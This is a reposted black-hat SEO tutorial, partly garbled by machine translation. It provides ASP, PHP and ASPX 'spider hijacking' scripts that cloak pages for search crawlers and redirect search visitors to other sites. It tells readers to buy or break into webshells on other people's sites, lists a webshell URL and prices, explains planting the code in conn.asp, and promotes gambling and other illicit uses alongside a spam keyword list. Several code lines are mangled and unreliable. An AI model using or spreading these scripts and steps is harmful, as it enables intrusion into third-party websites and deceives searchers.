Black hat seo search engine Duress Code (interest can be studied!)

Black hat seo search engine Duress Code (interest can be studied!)

First: asp asp version copy is saved as a file

Here Insert Picture Description
Here Insert Picture Description
Here Insert Picture Description
Here Insert Picture Description
Here Insert Picture Description
<%
function GetBot()
'查询蜘蛛
dim s_agent
GetBot=""
s_agent=Request.ServerVariables(“HTTP_USER_AGENT”) '关键判断语句
if instr(1,s_agent,“googlebot”,1) >0 then
GetBot=“google”
end if
if instr(1,s_agent,“msnbot”,1) >0 then
GetBot=“MSN”
end if
if instr(1,s_agent,“slurp”,1) >0 then
GetBot=“Yahoo”
end if
if instr(1,s_agent,“baiduspider”,1) >0 then
GetBot=“baidu”
end if
if instr(1,s_agent,“sohu-search”,1) >0 then
GetBot=“Sohu”
end if
if instr(1,s_agent,“lycos”,1) >0 then
GetBot=“Lycos”
end if
if instr(1,s_agent,“robozilla”,1) >0 then
GetBot=“Robozilla”
end if
end function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage=BytesToBstr(t,“GB2312”)'编码
End function
Function Newstring(wstr,strng)
Newstring=Instr(lcase(wstr),lcase(strng))
if Newstring<=0 then Newstring=Len(wstr)
End Function
Function GetBody(url)
on error resume next
Set Retrieval = CreateObject(“Microsoft.XMLHTTP”)
With Retrieval
.Open “Get”, url, False, “”, “”
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body,Cset)
dim objstream
Server.CreateObject objStream = SET ( "ADODB.Stream")
objstream.Type. 1 =
objstream.Mode =. 3
objStream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
the SET objStream = Nothing
End Function
Dim WSTR, str, url, Start, over, DTIME
IF GetBot = "baidu" the then
'to baidu spider customized content
url = " http://www.agsec.org " '
want to show to the page address spider
WSTR = getHTTPPage (url)
body = WSTR
Response.Write "" & body & ""
Response.End
ELSEIF GetBot = "google" the then
'to google spider customized content
url = "http://www.agsec.org "
WSTR = getHTTPPage (URL)
body WSTR =
Response.Write" "body & &" "
Response.End
End IF
IF InStr (the Request.ServerVariables (" HTTP_REFERER ")," www.baidu.com ")> 0 the then
' if user from www.baidu.com
Response.Redirect (" http://www.agsec.org/ ")
' jump specified address
End IF
%>
second: php version of php saved copy file

<? Php ############################################### # # this file can be put on similar inc, include such directory ## Home require_once ( 'path to this file'); on it that would be more covert # # # ############ #################################### if (ereg ( "http://www.baidu.com /search/spider.htm ", $ _SERVER [" HTTP_USER_AGENT "])) {// search engine is determined, this is Baidu may add their own spider / * Header (" HTTP / 1.1 301 Moved Permanently "); Header (" Location : http://www.agsec.org/ "); // this is 301 jumps, 301 for the main search engines, if you want to tell the search engines that the page has been replaced URL, then ... * / $ file = file_get_contents ( 'http://www.agsec.org/forum.php'); echo $ file; // the specified output file contents exit;} // Analyzing origin if (stristr ($ _SERVER [ 'HTTP_REFERER'], "baidu .com ")) {// if user from baidu.com //Header("HTTP/1.1 301 Moved Permanently"); // 301 jumps, 301 can not directly jump, 301 status code mainly for search engines use Header ( "Location: http://www.agsec.org/");// jump exit; }?>

Third: aspx version, this version is the most innovative, is the least, this will be issued.

<%@ Application Language=“C#” %>

Three versions, there are comments, it will be modified.

<%@ Application Language=“C#” %>

Aspx code that hijacked more than the original, I modified the URL to jump the line 19, 20 URL to the search engines, too, are http://www.hexun.com/, I put this target site sub-section saved as disk.aspx;

Next, at the root of the file plus aspx require_once ( '/ ztboa / disk.aspx' );
no skip, and the code is also displayed, the error correction, thank you

Answer:
the .NET do not know, nothing in contact, but the method is still to find you.

1. Create the "Add new item" = "" Web User Control, "a new ascx controls (page), as a.ascx, as the page is included;

2. Edit the page content a.ascx (this is included page, edit);

3. On page references, such as b.aspx, add a line in the file header information Register:

<%@ Register TagPrefix=“header” TagName=“header” Src= "a.ascx " %>

- "TagPrefix / TagName" represents the "label prefix / label name", can be customized to fill, Src represents a file location, fill out the relative path.

4. In the reference page needs to contain a.ascx b.aspx place by adding the following information to the specified location will a.ascx comprising:

<Label prefix: name tag id = "xxx" runat = "server" />

如:<header:header id=“header” runat=“server” />
<%@ page language=“java” contentType=“text/html; charset=UTF-8” %>

获得链接的来源 <% String google="www.google.com"; String referer = request.getHeader("referer");
		int a = referer.indexOf(google);
		if(a>-1){
		out.print("123");
			}
		else 
		out.print("456");

Just to see php code hijacking, thank you very much dedicated management
code is as follows

<? Php ############################################### # # this file can be put on similar inc, include such directory ## Home require_once ( 'path to this file'); on it that would be more covert # # # ############ #################################### if (ereg ( "http://www.baidu.com /search/spider.htm ", $ _SERVER [" HTTP_USER_AGENT "])) {// search engine is determined, this is Baidu may add their own spider / * Header (" HTTP / 1.1 301 Moved Permanently "); Header (" Location : http://www.hccbbs.com/ "); // this is 301 jumps, 301 for the main search engines, if you want to tell the search engines that the page has been replaced URL, then ... * / $ file = file_get_contents ( 'http://www.hccbbs.com/forum.php'); echo $ file; // the specified output file contents exit;} // Analyzing origin if (stristr ($ _SERVER [ 'HTTP_REFERER'], "baidu .com ")) {// if user from baidu.com //Header("HTTP/1.1 301 Moved Permanently"); // 301 jumps, 301 can not directly jump, 301 status code mainly for search engines use Header ( "Location: http://www.admin163.net/");// jump e xit;}>?

举例个例子,如果我要劫持到http://www.hexun.com/,关键词劫持我想要2个,和讯 和 金融这两个,请问代码要修那几处,除了代码修改,还需要准备哪些文件。我是新手,请给与详细解答,谢谢

答:

首先这个代码不是是说用来劫持某个或者某几个关键词,你只要把代码中的www.hccbbs.com替换成你希望做SEO的地址就可以了,比如你说的http://www.hexun.com/,还有倒数第四行的地址也改成你的http://www.hexun.com/,这样就行了。所实现的功能就是,当百度蜘蛛爬到站点A当中时,我们通过这段代码判断出来是百度蜘蛛来访,所以把我们的设定好的内容(第十四行)给蜘蛛看,因为这个站点的权重高,所以如果百度抓取了这个快照的话,当我们下次搜索这个关键词的话,这个快照就将会排在较靠前的位置(根据站点A的权重决定),而当来自百度搜索的用户点击这个链接的时候,我们同样是通过这段代码判断出来的,所以跳转到我们希望让用户看到的页面。

php代码中双斜杠(//)和//中间的内容都是注释,比如针对百度蜘蛛所采取的动作,其实你可以选择让蜘蛛看特定的内容,或者直接301跳转到你的页面(传递搜索引擎权重),具体采取哪种方式根据自己的需要,注释掉相应的内容即可。

<?php if (ereg("http://www.baidu.com", $_SERVER["HTTP_USER_AGENT"])) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: /s12.php"); exit; } if(stristr ($_SERVER['HTTP_REFERER'],"baidu.com")) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: http://www.agsec.org/"); exit; } if (ereg("http://www.google.com", $_SERVER["HTTP_USER_AGENT"])) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: /s12.php"); exit; } if(stristr ($_SERVER['HTTP_REFERER'],"google.com")) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: http://www.agsec.org/"); exit; } if (ereg("http://www.sogou.com", $_SERVER["HTTP_USER_AGENT"])) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: /s12.php"); exit; } if(stristr ($_SERVER['HTTP_REFERER'],"sogou.com")) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: http://www.agsec.org/"); exit; } if (ereg("http://www.soso.com", $_SERVER["HTTP_USER_AGENT"])) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: /s12.php"); exit; } if(stristr ($_SERVER['HTTP_REFERER'],"soso.com")) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: http://www.agsec.org/"); exit; } if (ereg("http://www.so.360.cn", $_SERVER["HTTP_USER_AGENT"])) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: /s12.php"); exit; } if(stristr ($_SERVER['HTTP_REFERER'],"so.360.cn")) { Header("HTTP/1.1 301 Moved Permanently"); Header("Location: http://www.agsec.org/"); exit; } ?>

s12.php

免费教黑客技术 AG安全团队(AGsec) 安全团队 技术支持:IT-AG安全团队

免费教黑客技术 AG安全团队(AGsec) 安全团队 技术支持:IT-AG安全团队

跳转

暗链

免费教黑客技术 AG安全团队(AGsec) 安全团队 技术支持:IT-AG安全团队

免费教黑客技术 安全团队 黑客 刷砖 卡枪 种子 免费盗号 在线看毛片 技术支持 红客 骇客 hack 赚钱 私服 外挂 HUC BUC XSD 卡盟 seo helen 盗号 网赚 黑帽 shell 免杀 渗透 html kz

关键字:黑客,技术,免费,渗透,编程,汇编,逆向,社工,测试,平台,安全,团队,安全团队,huc,红客,蓝课,绿客,联盟,sb,2b,刷砖,卡枪,刷枪,卡盟,黑帽,seo,shell,免杀,html,kz,buc,helen,种子,黑产,hack,基地,小组,论坛,社区,网,安全,信息,技术,lt,Team,Discuz,asp,php,jsp,aspx,web,政府,gov,漏洞,exp,易语言,C,c++,py,javav,vb,任务,中心,互联网,匿名者,中国,md5,代理,翻译,VPN,远控,d,压力测试,拒绝服务,远控,灰鸽子,vip,注入,ps,工具,外挂,辅助,苍井空,泷泽萝拉,av,成人电影,cn,百家乐,C++,第4色,狠狠撸,函数,BT,linux,系统,爆,劫持,首页,语法,单子,DW,DK,VC,电子书,游戏,wcg,抓鸡,3389,技术支持,脚本,web,提权,xss,跨站,sql,注入,魔方,洗衣机,空调,人才网,考试,超神,sec,90sec,80sec,色,0day,
大家好,★ 加好友请注明一下是黑帽seo ★,做互联网6年,一个无名菜鸟.

今天主要是带大家简单了解各种黑帽劫持手法 及SEO中端系列-★黑帽SEO蜘蛛劫持快速抢占流量(asp版带程序)(这段我会放在视频的前面给大家演示,需要用到的劫持代码我会打包给大家)★

本视频是语音加文字教程,请戴好耳机或开启音响;视频会很详细的讲解初中高级黑帽手法,可能会有点长,请耐心观看每个步骤。

本来打算出套白帽seo做淘宝客实现半自动化赚钱的教程,但是我自己也在操作竞价做暴利产品,没这么多时间,只能先录制一些简单的黑帽seo的东西;

不知道什么是淘宝客的可以看下百度百科的解释 http://baike.baidu.com/view/2133469.htm 这里不过多解释;

如果会点seo的基础的话,那么学起来比较快,做网赚的,seo是必备的基础.


本期知识点:

1.什么是seo? seo能做什么?

百度百科: http://baike.baidu.com/view/1047.htm
个人理解: 根据搜索引擎规则,做相应的优化调整方法,免费获得百度或者谷歌等排名,有排名则有流量,有流量则可以操作暴利产品,做淘宝客,做cps等,把流量转化成钱.·

2.什么是正规seo也就是白帽seo,什么是黑帽seo?

白帽seo: 网站标题,关键词,内容,外链等基本的优化,长期坚持,虽然枯燥但是比较稳定,适合企业站等正规网站.
黑帽seo: 利用搜索引擎规则漏洞或某些特定程序,欺骗百度蜘蛛,快速获得排名但也容易被K站,适合私服,保健产品等利润大,见效快的网站,只要有排名,出了单,有了利润,换个网站接着做,一个域名才几块?

3.黑帽seo有哪些技巧?什么是蜘蛛劫持?

百度百科: http://baike.baidu.com/view/1064169.htm http://baike.baidu.com/view/8626418.htm
个人理解: 蜘蛛劫持,权重劫持,连接跳转,友链欺骗,无限收录,快速权重7,挂黑莲,链轮,站群,泛解析等

蜘蛛劫持: 蜘蛛劫持就是黑帽SEOer通过各种非正常手段,劫持搜索引擎蜘蛛(如:百度蜘蛛),其表现为:百度快照是一个页面,用户点击进入网站后看到的是另一个页面。根据网站程序的不同,比如asp,php,aspx,htm,那么劫持手法和程序也不同.

劫持案例: http://www.baidu.com/s?tn=baiduhome_pg&ie=utf-8&bs=456游戏大厅完整版&f=8&rsv_bp=1&wd=456游戏大厅&rsv_sug3=3&rsv_sug=0&rsv_sug4=156&rsv_sug1=2&inputT=1078

4.做黑帽seo之前需要哪些准备?

webshell 百度指数 权重 外链 等一些名词的理解.

以上内容,都是个人总结.当然这只是一部分,想做网赚,学的尽可能越全对你自己也更有好处.

5.黑帽seo适合哪种行业?

暴利产品:代理或者进一些暴利产品,通过黑帽手法快速做到百度首页,让流量转化成钱;

黑色行业:如博彩,百家乐,代孕,皇冠现金网,太阳城娱乐城,私服行业,等灰色行业高竞争关键词;

不夸张的说国内某些大型门户站,都有涉入。


下面开始操作.(SEO中端系列-黑帽SEO蜘蛛劫持快速抢占流量(asp版带程序))

webshell一枚,有能力的自己入侵,没能力的,可以去一些webshell交易的群里购买.

http://www.jinhuipipe.com/admin/UploadFiles/da.asp

根据自己的关键词的情况,选择相应的webshell.下面是个人操作经验得出的数据.

权重2的shell 15 可做百度指数100-1000左右的关键词
权重3的shell 30 可做百度指数1000-2000左右的关键词
权重4的shell 40 可做百度指数2000-5000左右的关键词
权重5的shell 50 可做百度指数5000-8000左右的关键词

这几十块的投资不算什么,一个指数2000的关键词,最起码给你带来1000流量,转化最低1%,那也有10人购买,利润自想.
首先,熟悉webshell操作,跟 我的电脑 差不多,文件管理.

本次的劫持方法,是利用include调用conn.asp这个文件,实现劫持的目的.

第一步:配置asp版的劫持程序.

第二步:如果shell主页没有 ,我们就自己添加一下,一般情况asp网站都有的.

第三步:修改调用代码.代码的意思是 判断来访路径 是搜索引擎程序,还是真实客户访问,进行内容抓取,也就是快照,然后判断跳转.然后把代码上传到conn.asp文件里面.

做完以上步骤,可以刷下外链,快速吸引蜘蛛,刷外链地址:http://tool.lusongsong.com/seo/

等快照更新就可显示我们自己网站的快照,并进行判断来路跳转了.

OK,就算搞定了.

其实很简单的.操作都会吧.

这个是以前做的,忘记给人家恢复了,快照已经更新成我们劫持的了,跳转我等会会去掉.


无论是asp的蜘蛛劫持还是php的蜘蛛劫持,aspx的劫持,html的劫持等,都分为三大步骤,

第一 配置程序 第二 劫持快照 第三 判断跳转

不同的是程序,相同的是思路.

根据每个webshell的不同,关键词的难度等因素,选择最适合的蜘蛛劫持方式.

像global.asa这种劫持方法,早就过时了,会提示"黑客入侵,风险提示等"


关于其他中高级黑帽劫持都有哪些?我带大家先简单了解下。


下面分享一下做白帽seo的精髓(有做白帽seo的可以去看下)

大家都知道,今年百度推出的 绿萝算法,主要打击垃圾外链,低质量站点;

本视频属于高级seo知识,我可以保证的说学会本视频里的技巧,做白帽seo你一定ok的:

Video Tutorial: create high-quality original articles: http://www.56.com/u92/v_NzQwNjM3ODU.html

To prevent the video can not be played, with two video address http://v.youku.com/v_show/id_XNDU2NzQyMzI4.html http://www.aipai.com/c12/NDw4JykhImgnaiQv.html

Text tutorial (starting A5): to create 95% of the original article by image conversion software http://www.admin5.com/article/20120522/432575.shtml

Text tutorial (starting A5): How I within ten days to do the Baidu weights 1 4: http://www.admin5.com/article/20120608/436750.shtml


Well, today on the first stop here, just recently, busy, not enough time ah.

A few days and then out the other versions of the advanced version of hijacking or white hat seo tutorial and tutorial bid Amoy treasure off like it.

, ★ plus a friend please indicate what is black hat seo ★, do the Internet six years, a nameless rookie.

Want to do seo, black hat seo, Taobao customers, bidding friends tell me the exchange and common progress!

Guess you like

Origin blog.csdn.net/c2289206/article/details/91352686